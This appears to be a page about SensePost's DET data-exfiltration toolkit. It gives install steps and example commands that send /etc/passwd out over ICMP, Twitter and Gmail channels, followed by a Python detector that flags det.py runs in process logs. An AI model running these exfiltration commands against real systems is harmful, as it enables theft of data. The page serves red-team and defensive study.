Data Exfiltration using single or multiple channels

DET (provided AS IS) is a proof of concept for performing data exfiltration over either a single channel or multiple channels at the same time. The idea was to create a generic toolkit into which any kind of protocol or service can be plugged.

Features
So far, DET supports multiple protocols, listed here:
> HTTP(S)
> ICMP
> DNS
> SMTP/IMAP (e.g. Gmail)
> Raw TCP
> PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))
> Encryption (e.g. AES-256)

And other “services”:
> Google Docs (Unauthenticated)
> Twitter (Direct Messages)

Usage

det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]
 
Data Exfiltration Toolkit (SensePost)
 
optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

Installation

Download from GitHub.

git clone https://github.com/sensepost/DET.git /opt/DET

Then:

pip install -r requirements.txt --user

Examples

ICMP
Server side

python det.py -c /config.json -p icmp -L

Client side

python det.py -f /etc/passwd -p icmp -c ./config.js

Combining two channels (Gmail/Twitter)
Server side

python det.py -L -c ./config.json -p twitter,gmail

Client side

python det.py -f /etc/passwd -c ./config.json -p twitter,gmail
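
For defenders, the options in the help text above double as a process-audit signature. The following is an added example, not part of DET or the original page: it parses logged command lines for det.py invocations and pulls out the mode, plugins and target. The function names and the sample lines are constructed for illustration.

```python
import shlex

# Value-taking options, as documented in the det.py help text on this page.
VALUE_FLAGS = {"-c": "config", "-f": "file", "-d": "folder",
               "-p": "plugins", "-e": "exclude"}

def parse_det_cmdline(cmdline):
    """Describe a det.py invocation, or return None if the line is not one."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:               # unbalanced quotes in the logged line
        argv = cmdline.split()
    # The script may follow an interpreter and carry a path (/opt/DET/det.py).
    idx = next((i for i, a in enumerate(argv)
                if a.rsplit("/", 1)[-1].lower() == "det.py"), None)
    if idx is None:
        return None
    hit = {"mode": "client", "config": None, "file": None,
           "folder": None, "plugins": [], "exclude": []}
    args, i = argv[idx + 1:], 0
    while i < len(args):
        flag, val = args[i][:2], args[i][2:]
        if args[i] == "-L":          # server (listener) mode
            hit["mode"] = "server"
        elif flag in VALUE_FLAGS:
            if not val and i + 1 < len(args):   # "-p dns" as well as "-pdns"
                i += 1
                val = args[i]
            name = VALUE_FLAGS[flag]
            if val:
                hit[name] = val.split(",") if name in ("plugins", "exclude") else val
        i += 1
    return hit

def find_det(lines):
    """Return (line_number, details) for every det.py invocation in lines."""
    hits = ((n, parse_det_cmdline(l)) for n, l in enumerate(lines, 1))
    return [(n, h) for n, h in hits if h is not None]

# Constructed process-audit command lines, for illustration only.
SAMPLE = [
    "python det.py -c ./config.json -p icmp -L",
    "python /opt/DET/det.py -f /etc/passwd -c ./config.json -p twitter,gmail",
    "python manage.py runserver",
    "python det.py -d /etc/ -pdns -e gmail,icmp",
]

if __name__ == "__main__":
    for n, h in find_det(SAMPLE):
        print(n, h["mode"], h["plugins"], h["file"] or h["folder"])
```

Matching on the script name alone is easy to evade by renaming the file, so treat a hit as a lead and correlate it with network telemetry for the listed channels.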